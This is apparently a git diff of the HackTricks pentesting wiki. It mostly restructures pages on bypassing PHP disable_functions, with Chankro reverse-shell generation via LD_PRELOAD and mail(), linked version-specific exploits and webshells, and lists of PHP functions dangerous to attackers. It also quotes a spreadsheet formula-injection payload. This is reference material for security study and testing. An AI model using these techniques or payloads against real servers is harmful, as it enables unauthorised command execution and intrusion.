#### Bypass using Chankro
|
||||
|
||||
In order to abuse this misconfiguration you can [**Chankro**](https://github.com/TarlogicSecurity/Chankro). This is a tool that will **generate a PHP exploit** that you need to upload to the vulnerable server and execute it (access it via web).\
|
||||
**Chankro** will write inside the victims disc the **library and the reverse shell** you want to execute and will use the**`LD_PRELOAD` trick + PHP `mail()`** function to execute the reverse shell.
|
||||
**Chankro** will write inside the victims disc the **library and the reverse shell** you want to execute and will use the\*\*`LD_PRELOAD` trick + PHP `mail()`\*\* function to execute the reverse shell.
|
||||
|
||||
Note that in order to use **Chankro**, `mail` and `putenv` **cannot appear inside the `disable_functions` list**.\
|
||||
In the following example you can see how to **create a chankro exploit** for **arch 64**, that will execute `whoami` and save the out in _/tmp/chankro\_shell.out_, chankro will **write the library and the payload** in _/tmp_ and the **final exploit** is going to be called **bicho.php** (that's the file you need to upload to the victims server):
|
||||
|
@ -583,7 +582,7 @@ python2 chankro.py --arch 64 --input shell.sh --path /tmp --output bicho.php
|
|||
If you find that **mail** function is blocked by disabled functions, you may still be able to use the function **mb\_send\_mail.**\
|
||||
More information about this technique and Chankro here: [https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/](https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/)
|
||||
|
||||
## "Bypass" using PHP capabilities
|
||||
### "Bypass" using PHP capabilities
|
||||
|
||||
Note that using **PHP** you can **read and write files, create directories and change permissions**.\
|
||||
You can even **dump databases**.\
|
||||
|
@ -591,10 +590,16 @@ Maybe using **PHP** to **enumerate** the box you can find a way to escalate priv
|
|||
|
||||
I have created a webshell that makes very easy to perform this actions (note that most webshells will offer you this options also): [https://github.com/carlospolop/phpwebshelllimited](https://github.com/carlospolop/phpwebshelllimited)
|
||||
|
||||
## Modules/Version dependent bypasses
|
||||
### Modules/Version dependent bypasses
|
||||
|
||||
There are several ways to bypass disable\_functions if some specific module is being used or exploit some specific PHP version:
|
||||
|
||||
* [**FastCGI/PHP-FPM (FastCGI Process Manager)**](disable\_functions-bypass-php-fpm-fastcgi.md)
|
||||
* [**Bypass with FFI - Foreign Function Interface enabled**](broken-reference)****
|
||||
* [**Bypass via mem**](disable\_functions-bypass-via-mem.md)
|
||||
* [**mod\_cgi**](disable\_functions-bypass-mod\_cgi.md)
|
||||
* [**PHP Perl Extension Safe\_mode**](disable\_functions-bypass-php-perl-extension-safe\_mode-bypass-exploit.md)
|
||||
* [**dl function**](disable\_functions-bypass-dl-function.md)****
|
||||
* [**This exploit**](https://github.com/mm0r1/exploits/tree/master/php-filter-bypass)
|
||||
* 5.\* - exploitable with minor changes to the PoC
|
||||
* 7.0 - all versions to date
|
||||
|
@ -604,28 +609,24 @@ There are several ways to bypass disable\_functions if some specific module is b
|
|||
* 7.4 - all versions to date
|
||||
* 8.0 - all versions to date
|
||||
* [**From 7.0 to 8.0 exploit (Unix only)**](https://github.com/mm0r1/exploits/blob/master/php-filter-bypass/exploit.php)
|
||||
* [**FastCGI/PHP-FPM (FastCGI Process Manager)**](disable\_functions-bypass-php-fpm-fastcgi.md)
|
||||
* **dl function**
|
||||
* [**PHP 7.0=7.4 (\*nix)**](disable\_functions-bypass-php-7.0-7.4-nix-only.md#php-7-0-7-4-nix-only)
|
||||
* [**Imagick 3.3.0 PHP >= 5.4**](disable\_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md)
|
||||
* [**PHP 5.x Shellsock**](disable\_functions-php-5.x-shellshock-exploit.md)
|
||||
* [**PHP 5.2.4 ionCube**](disable\_functions-php-5.2.4-ioncube-extension-exploit.md)
|
||||
* [**PHP <= 5.2.9 Windows**](disable\_functions-bypass-php-less-than-5.2.9-on-windows.md)
|
||||
* [**PHP 5.2.4/5.2.5 cURL**](disable\_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md)
|
||||
* [**PHP Perl Extension Safe\_mode**](disable\_functions-bypass-php-perl-extension-safe\_mode-bypass-exploit.md)
|
||||
* [**PHP 5.2.3 -Win32std**](disable\_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md)
|
||||
* [**PHP 5.2 FOpen exploit**](disable\_functions-bypass-php-5.2-fopen-exploit.md)
|
||||
* [**Bypass via mem**](disable\_functions-bypass-via-mem.md)
|
||||
* [**mod\_cgi**](disable\_functions-bypass-mod\_cgi.md)
|
||||
* [**PHP 4 >= 4.2.-, PHP 5 pcntl\_exec**](disable\_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl\_exec.md)
|
||||
|
||||
## **ALL IN ONE**
|
||||
### **Automatic Tool**
|
||||
|
||||
The code with more options mentioned here available I have found is [https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php](https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php)
|
||||
The following script tries some of the methods commented here:\
|
||||
[https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php](https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php)
|
||||
|
||||
# Other Interesting PHP functions
|
||||
## Other Interesting PHP functions
|
||||
|
||||
## List of functions which accept callbacks
|
||||
### List of functions which accept callbacks
|
||||
|
||||
These functions accept a string parameter which could be used to call a function of the attacker's choice. Depending on the function the attacker may or may not have the ability to pass a parameter. In that case an Information Disclosure function like phpinfo() could be used.\
|
||||
Function => Position of callback arguments\
|
||||
|
@ -662,7 +663,7 @@ Function => Position of callback arguments\
|
|||
'sqlite\_create\_aggregate' => array(2, 3),\
|
||||
'sqlite\_create\_function' => 2,
|
||||
|
||||
## Information Disclosure
|
||||
### Information Disclosure
|
||||
|
||||
Most of these function calls are not sinks. But rather it maybe a vulnerability if any of the data returned is viewable to an attacker. If an attacker can see phpinfo() it is definitely a vulnerability.\
|
||||
**phpinfo**\
|
||||
|
@ -683,7 +684,7 @@ Most of these function calls are not sinks. But rather it maybe a vulnerability
|
|||
**getmypid**\
|
||||
**getmyuid**
|
||||
|
||||
## Other
|
||||
### Other
|
||||
|
||||
**extract** - Opens the door for register\_globals attacks (see study in scarlet).\
|
||||
**parse\_str** - works like extract if only one argument is given.\
|
||||
|
@ -703,7 +704,7 @@ putenv\
|
|||
**posix\_setsid**\
|
||||
**posix\_setuid**
|
||||
|
||||
## Filesystem Functions
|
||||
### Filesystem Functions
|
||||
|
||||
According to RATS all filesystem functions in php are nasty. Some of these don't seem very useful to the attacker. Others are more useful than you might think. For instance if allow\_url\_fopen=On then a url can be used as a file path, so a call to copy($\_GET\['s'], $\_GET\['d']); can be used to upload a PHP script anywhere on the system. Also if a site is vulnerable to a request send via GET everyone of those file system functions can be abused to channel and attack to another host through your server.
|
||||
|
||||
|
@ -802,7 +803,6 @@ According to RATS all filesystem functions in php are nasty. Some of these don't
|
|||
**php\_strip\_whitespace**\
|
||||
**get\_meta\_tags**
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -818,5 +818,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -219,7 +219,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
|
|||
</methodCall>
|
||||
```
|
||||
|
||||
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png>)
|
||||
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
|
||||
|
||||
![](<../../.gitbook/assets/image (102).png>)
|
||||
|
||||
|
|
|
@ -41,7 +41,7 @@ Electron has 2 process types:
|
|||
* Main Process (has complete access to NodeJS)
|
||||
* Renderer Process (should have NodeJS restricted access for security reasons)
|
||||
|
||||
![](<../../../.gitbook/assets/image (307) (5).png>)
|
||||
![](<../../../.gitbook/assets/image (307) (5) (1).png>)
|
||||
|
||||
A **renderer process** will be a browser window loading a file:
|
||||
|
||||
|
|
|
@ -17,7 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png" alt="" data-size="original">
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14).png" alt="" data-size="original">
|
||||
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
|
@ -313,7 +313,7 @@ This helps to upload a file that complins with the format of several different f
|
|||
More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
|
|
@ -59,7 +59,7 @@ The good news is that **this payload is executed automatically when the file is
|
|||
|
||||
It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
|
||||
|
||||
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
|
||||
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
|
||||
|
||||
### More
|
||||
|
||||
|
|
|
@ -17,7 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png" alt="" data-size="original">
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14).png" alt="" data-size="original">
|
||||
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
|
@ -262,7 +262,7 @@ However, imagine a situation where the maximun length of the ID is 4 (0001-9999)
|
|||
{% embed url="https://github.com/ticarpi/jwt_tool" %}
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
|
|
@ -19,7 +19,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
@ -239,7 +239,7 @@ intitle:"phpLDAPadmin" inurl:cmd.php
|
|||
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
|
|
@ -26,7 +26,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
## Attacks Graphic
|
||||
|
||||
![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (4).png>)
|
||||
![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (4).png>)
|
||||
|
||||
## Tool
|
||||
|
||||
|
|
|
@ -17,7 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
|
||||
<img src="../../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
@ -173,7 +173,7 @@ SELECT $TAG$hacktricks$TAG$;
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
|
||||
<img src="../../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
|
|
@ -285,7 +285,7 @@ HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
|||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
||||
```
|
||||
|
||||
![](<../../.gitbook/assets/image (307).png>)
|
||||
![](<../../.gitbook/assets/image (307) (5).png>)
|
||||
|
||||
## Powershell
|
||||
|
||||
|
|
Loading…
Reference in a new issue